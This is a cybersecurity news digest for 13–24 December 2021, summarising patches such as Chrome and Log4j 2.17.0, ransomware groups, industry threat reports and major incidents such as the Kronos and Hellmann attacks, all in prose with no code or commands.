Cybersecurity Digest #40: 13/12/2021 – 24/12/2021

Cybersecurity news

  • Google has released Chrome 96.0.4664.110 for Windows, Mac, and Linux, to address a high-severity zero-day vulnerability exploited in the wild. Although the company says this update may take some time to reach all users, the update has already begun rolling out Chrome 96.0.4664.110 worldwide in the Stable Desktop channel.
  • Apache has released version 2.17.0 of the patch for Log4j after discovering issues with their previous release, which came out on Tuesday. Apache said version 2.16 “does not always protect from infinite recursion in lookup evaluation” and explained that it is vulnerable to CVE-2021-45105, a denial of service vulnerability. They said the severity is “high” and gave it a CVSS score of 7.5.
  • Industrial and government organizations, including enterprises in the military-industrial complex and research laboratories, are the targets of a new malware botnet dubbed PseudoManyscrypt that has infected roughly 35,000 Windows computers this year alone. The name comes from its similarities to the Manuscrypt malware, which is part of the Lazarus APT group’s attack toolset, Kaspersky researchers said, characterizing the operation as a “mass-scale spyware attack campaign”.
  • Mozilla has fixed an issue in its Firefox browser where usernames and passwords were being recorded in the Windows Cloud Clipboard feature, in what the organization categorized as a severe security risk that could have exposed credentials to non-owners whenever users copied or cut a password.
  • Microsoft warned customers to patch two Active Directory domain service privilege escalation security flaws that, when combined, allow attackers to easily takeover Windows domains. The company released security updates to address the two security vulnerabilities (tracked as CVE-2021-42287 and CVE-2021-42278 and reported by Andrew Bartlett of Catalyst IT) during the November 2021 Patch Tuesday.
  • A new ransomware operation named Rook has appeared recently on the cyber-crime space, declaring a desperate need to make “a lot of money” by breaching corporate networks and encrypting devices. Although the introductory statements on their data leak portal were marginally funny, the first victim announcements on the site have made it clear that Rook is not playing games.

Cybersecurity Blog Posts

  • Dotan BarNo dedicated his article to unused identities and growing security threat. In early May 2021, Colonial Pipeline announced that they had been hacked. The hackers had breached their network via a compromised legacy VPN account. The author states that this incident has nearly all the elements of security gone wrong.
  • SOC 2 has become the de facto standard for businesses in all industries to build trust and unlock sales. Most security professionals have experienced a SOC 2 audit and understand the details of what goes into earning these coveted reports. Aj Yawn published An Expert’s Guide to Reviewing SOC 2 Reports.
  • (ISC)² experts published an article about system authorization. Based on NIST standards, system authorization formalizes the decision-making process, placing clear directives and accountability up front where they can be communicated and clearly documented. The CAP Certification from (ISC)² has been designed to help individuals attain the credibility and practical knowledge that will enable them to take on this role with confidence and competence.
  • Security Operations Center can learn a lot from what IT operations learned during the SRE revolution. In the new post of the series, Anton Chuvakin plan to extract the lessons for SOC centered on another SRE principle — evolving automation.

Research and analytics

  • Over the past year, the number of cyberattacks in every industry has grown exponentially. To provide a comprehensive picture of modern cybercrime, Group-IB experts have prepared five cyber threat reports – Hi-Tech Crime Trends 2021/2022. Each is dedicated to one of the main threats that every business should consider. The reports are intended to be used as a practical guide for strategic and tactical planning.
  • According to Kaspersky Security Bulletin 2021 Statistics, 15.45% of internet user computers worldwide experienced at least one Malware-class attackduring 2021 year. Kaspersky solutions blocked 687,861,449 attacks launched from online resources across the globe.
  • Securelist by Kaspersky takes a deep dive into the evolution of ransomware in 2021, starting with the ransomware events of 2021 that made for some of the biggest headlines. From January to November 2021, the number of victims was 30% higher than that in all of 2020, affecting a total of 1,500 organizations.
  • Researchers from Technical University of Darmstadt and University of Brescia have published results of research Attacks on Wireless Coexistence: Exploiting Cross-Technology Performance Features for Inter-Chip Privilege Escalation. They demonstrate that a Bluetooth chip can directly extract network passwords and manipulate traffic on a Wi-Fi chip.
  • Recognizing the significance of Log4Shell vulnerability, SANS Instructors Dr. Johannes Ullrich, Bojan Zdrnja, and Mick Douglas teamed up to do an live stream to share the details they had learned about the exploitation, but also how to detect the attack as well as protect environments from it. As this is a topic that’s creating lots of buzz, they ve embedded the live stream recording here.
  • HackerOne, the world’s most trusted hacker-powered security platform, announced that hackers have reported over 66,000 valid vulnerabilities this year – over 20% more than 2020 – with hacker-powered pentests seeing a 264% increase in reported vulnerabilities. This year’s report revealed bounty prices for high and critical vulnerabilities are rising as organizations prioritize high-impact.
  • According to DataDome study, mobile app & API threats at critical high make bot protection op riority for online commerce. ⅔ online commerce respondents say mobile app & API protection are key priorities for 2022, 45% say the cost of man-hours to mitigate threats is the main impact of bot attacks, 71% of bot attacks target high-profile events and promotions.
  • Get an inside look as (ISC)² Certified Cloud Security Professionals draw upon their experience and expertise from working in the field every day to share with us why this lack of qualified staff can be the biggest impediment to cloud adoption. This eBook focuses on a discussion around key results from the 2021 Cloud Security Report, sponsored by (ISC)² which is based on a comprehensive survey of 750+ cybersecurity professionals.
  • Check Point Research spotted the resurgence of Phorpiex, an old threat known for its sextortion spam campaigns, crypto-jacking, cryptocurrency clipping and ransomware spread. In one year, Phorpiex bots hijacked 969 transactions and stole 3.64 Bitcoin, 55.87 Ether, and $55,000 in ERC20 tokens accounting for almost half a million in US dollars.
  • Pulse and Vulcan Cyber surveyed 200 technology IT security decision-makers to find out how vulnerability risk is prioritized, managed and reduced. According to this new research, security teams are not doing enough to correlate vulnerability data with actual business risk. Most vulnerability management programs are not giving business leaders and IT management professionals the risk insights they need to effectively protect valuable business assets, as opposed to any business asset regardless of relevance to the business.
  • Organizations are increasingly relying on external support from managed services. In order to gain a better understanding of the state of affairs in managed services security, MITRE Engenuity commissioned Cybersecurity Insiders to run an extensive industry survey to answer essential questions. The results from the 2021 Managed Services Report: No Rest for the Wary highlight the substantial low level of confidence organizations have in their managed services support than their in-house technology, people, and processes.
  • Darktrace, a global leader in cyber security AI, reported that the information technology (IT) and communications sector was the most targeted industry globally in 2021, as uncovered by Darktrace’s security researchers. Darktrace’s findings show that its artificial intelligence autonomously interrupted an average of 150,000 threats per week against the sector in 2021.

Major Cyber Incidents

  • Microsoft reported that threat actors are exploiting a critical security vulnerability in Log4jShell to deliver a new family of ransomware called Khonsari on self-hosted Minecraft servers. Bitdefender said it has observed multiple attempts by attackers to deploy the Khonsari ransomware payload that exploits the Log4jShell bug to attack Windows machines.
  • Conti ransomware operation is using the critical Log4Shell exploit to gain rapid access to internal VMware vCenter Server instances and encrypt virtual machines. The gang did not waste much time adopting the new attack vector and is the first “top-tier” operation known to weaponize the Log4j vulnerability.
  • Workforce management solutions provider Kronos disclosed that the UKG solutions using the ‘Kronos Private Cloud’ are unavailable due to a ransomware attack. UKG solutions that are not using the Kronos Private Cloud are unaffected, including UKG Pro, UKG Ready, and UKG Dimensions.
  • A cyber-attack has been carried out against major German logistics provider Hellmann Worldwide Logistics. The security incident forced Hellmann to take its central data center offline. The company has also hired “external renowned security specialists” to investigate the attack.
  • A hacker group called Sharp Boys announced that it had hacked two Israeli hiking websites, leaking the information of 100,000 users and offering the information of around three million people for sale. The leaked data includes emails, addresses, photos and phone numbers. The two affected sites were Tiyuli and Lametayel. Tiyuli is a website that provides information on hiking, attractions, maps and places to sleep throughout Israel. Lametayel is a chain of hiking and sporting goods stores and its site also provides information on hiking.
  • Less than a week before the Christmas holiday, French IT services company Inetum Group was hit by a ransomware attack that had a limited impact on the business and its customers. Inetum Group did not disclose the name of the malware used but according to Valéry Marchive, editor-in-chief at French publication LeMagIt, the attackers used BlackCat ransomware, also known as ALPHV and Noberus.